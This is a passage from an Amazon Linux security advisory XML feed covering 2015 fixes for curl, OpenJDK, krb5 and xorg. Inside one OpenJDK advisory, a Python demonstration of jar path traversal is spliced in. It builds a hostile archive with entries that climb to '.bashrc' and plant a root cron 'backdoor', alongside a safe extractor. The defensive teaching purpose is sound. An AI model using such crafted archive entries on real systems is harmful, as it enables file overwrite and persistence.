arch="i686"><filename>Packages/glibc-static-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.142.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-514</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-514: medium priority package update for curl</title><issued date="2015-04-22 16:14:00" /><updated date="2015-04-23 21:05:00" /><severity>medium</severity><description>Package 
updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3148:
1213351:
CVE-2015-3148 curl: "Negotiate" not treated as connection-oriented
CVE-2015-3145:
1213347:
CVE-2015-3145 curl: cookie parser out of boundary memory access
CVE-2015-3144:
1213335:
CVE-2015-3144 curl: host name out of boundary memory access
CVE-2015-3143:
1213306:
CVE-2015-3143 curl: re-using authenticated connection when unauthenticated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143" title="" id="CVE-2015-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3144" title="" id="CVE-2015-3144" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145" title="" id="CVE-2015-3145" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148" title="" id="CVE-2015-3148" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-3.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-515</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-515: important priority package update for java-1.6.0-openjdk</title><issued date="2015-04-23 00:44:00" /><updated date="2015-04-23 21:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
A flaw was discovered in the Beans component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0808.html" title="" id="RHSA-2015:0808" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.35" release="1.13.7.1.70.amzn1" 
epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-516</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-516: important priority package update for java-1.7.0-openjdk</title><issued date="2015-04-23 00:44:00" /><updated date="2015-04-23 21:04:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
A flaw was discovered in the Beans component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0806.html" title="" id="RHSA-2015:0806" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.79-2.5.5.1.59.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.79" release="2.5.5.1.59.amzn1" 
epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-517</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-517: important priority package update for java-1.8.0-openjdk</title><issued date="2015-05-05 15:44:00" /><updated date="2015-05-05 16:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
Multiple flaws were discovered in the Beans and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-0470:
Multiple flaws were discovered in the Beans and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
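The jar flaw above (CVE-2005-1080 and CVE-2015-0480, listed in ALAS-2015-515, ALAS-2015-516 and this advisory) is the generic archive-extraction mistake: the extractor joins each entry name onto the destination directory, so an entry named ../../.bashrc or /etc/cron.d/backdoor is written wherever its name points. The block below is an added example in Python, not code from the advisory, from OpenJDK or from the jar tool; it assumes nothing about jar's internals and uses the zipfile module because a JAR is a zip archive. The hostile archive is constructed in memory, and safe_member_path is the check a hardened extractor applies before writing each entry.

```python
import io
import os
import tempfile
import zipfile


def build_hostile_jar():
    """Constructed for the demo: two ordinary entries plus two that must not be written
    where their names point (a JAR is a zip, so zipfile reproduces the shape of the bug)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        z.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")
        z.writestr("../../.bashrc", "echo owned\n")                 # climbs out of dest
        z.writestr("/etc/cron.d/backdoor", "* * * * * root id\n")   # absolute path
    return buf.getvalue()


def safe_member_path(dest, name):
    """Return the on-disk path for archive entry `name` under `dest`, or None when the
    entry is absolute or resolves outside `dest`. The naive extractor simply joins
    dest and name, which is exactly what lets '../' escape."""
    if os.path.isabs(name) or name.startswith(("/", "\\")):
        return None
    dest = os.path.realpath(dest)
    # realpath normalises '..' and follows any symlink already present under dest,
    # so a later entry cannot be written through an earlier one to the outside.
    target = os.path.realpath(os.path.join(dest, name))
    if os.path.commonpath([dest, target]) != dest:
        return None
    return target


def extract_jar(data, dest):
    """Extract every entry of `data` (zip bytes) under `dest`, refusing unsafe names.
    Returns (extracted, rejected) lists of entry names."""
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            target = safe_member_path(dest, info.filename)
            if target is None:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with z.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def demo():
    """Extract the constructed archive into a scratch directory; returns (extracted, rejected)."""
    with tempfile.TemporaryDirectory() as tmp:
        return extract_jar(build_hostile_jar(), tmp)


if __name__ == "__main__":
    ok, bad = demo()
    print("extracted:", ok)
    print("rejected: ", bad)
```

The same check applies to tar, ZIP and any other container whose entry names the producer controls. With this extractor, symlink entries are written as ordinary files containing the link target (zipfile does not recreate symlinks), so they cannot be used to redirect a later entry outside the destination.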
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0470" title="" id="CVE-2015-0470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0809.html" title="" id="RHSA-2015:0809" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.45-30.b13.5.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.45-30.b13.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-518</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-518: medium priority package update for krb5</title><issued date="2015-05-05 15:44:00" /><updated date="2015-05-05 16:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9422:
It was found that the MIT Kerberos administration server (kadmind) incorrectly accepted certain authentication requests for two-component server principal names. A remote attacker able to acquire a key with a particularly named principal (such as "kad/x") could use this flaw to impersonate any user to kadmind, and perform administrative actions as that user.
CVE-2014-9421:
A double-free flaw was found in the way MIT Kerberos handled invalid External Data Representation (XDR) data. An authenticated user could use this flaw to crash the MIT Kerberos administration server (kadmind), or other applications using Kerberos libraries, via specially crafted XDR packets.
CVE-2014-5355:
It was found that the krb5_read_message() function of MIT Kerberos did not correctly sanitize input, and could create invalid krb5_data objects. A remote, unauthenticated attacker could use this flaw to crash a Kerberos child process via a specially crafted request.
CVE-2014-5353:
If kadmind were used with an LDAP back end for the KDC database, a remote, authenticated attacker who has the permissions to set the password policy could crash kadmind by attempting to use a named ticket policy object as a password policy for a principal.
CVE-2014-5352:
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5 library processed valid context deletion tokens. An attacker able to make an application using the GSS-API library (libgssapi) call the gss_process_context_token() function could use this flaw to crash that application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5352" title="" id="CVE-2014-5352" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5353" title="" id="CVE-2014-5353" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5355" title="" id="CVE-2014-5355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9421" title="" id="CVE-2014-9421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9422" title="" id="CVE-2014-9422" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0794.html" title="" id="RHSA-2015:0794" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-devel" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="37.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="37.29.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-37.29.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-37.29.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.10.3" release="37.29.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-37.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-519</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-519: medium priority package update for xorg-x11-server</title><issued date="2015-05-05 15:55:00" /><updated date="2015-05-05 16:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0255:
A buffer over-read flaw was found in the way the X.Org server handled XkbGetGeometry requests. A malicious, authorized client could use this flaw to disclose portions of the X.Org server memory, or cause the X.Org server to crash using a specially crafted XkbGetGeometry request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0255" title="" id="CVE-2015-0255" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0797.html" title="" id="RHSA-2015:0797" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.15.0" release="26.41.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.15.0-26.41.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="26.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.15.0-26.41.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="26.41.amzn1" epoch="0" 
